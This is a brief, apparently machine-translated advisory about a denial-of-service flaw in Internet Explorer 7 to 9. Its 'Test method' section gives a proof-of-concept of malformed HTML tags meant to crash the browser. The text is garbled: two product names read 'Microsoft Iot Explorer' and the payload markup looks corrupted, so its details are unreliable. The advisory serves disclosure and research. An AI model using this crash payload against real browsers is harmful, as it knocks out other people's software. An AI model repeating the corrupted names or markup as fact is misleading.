Microsoft Internet Explorer special HTML Stack Overflow Denial of Service Vulnerability
Release date:
Updated on:
Affected Systems:
Microsoft Internet Explorer 9
Microsoft Iot Explorer 8.0
Microsoft Iot Explorer 7.0
Description:
--------------------------------------------------------------------------------
Bugtraq id: 57002
Microsoft Internet Explorer is a Web browser launched by Microsoft.
Microsoft Internet Explorer has a security vulnerability in implementation, which can cause the affected browser to crash and cause a denial of service.
<* Source: Jean Pascal Pereira
Link: http://1337day.com/exploit/20006
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
<Table> </for xmlns = "1">
<Td> <datetime> <colgroup>
<Id> <dd> <col>
</Table> <object>
<Hr> <base>
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Microsoft
---------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://www.microsoft.com/windows/ie/default.asp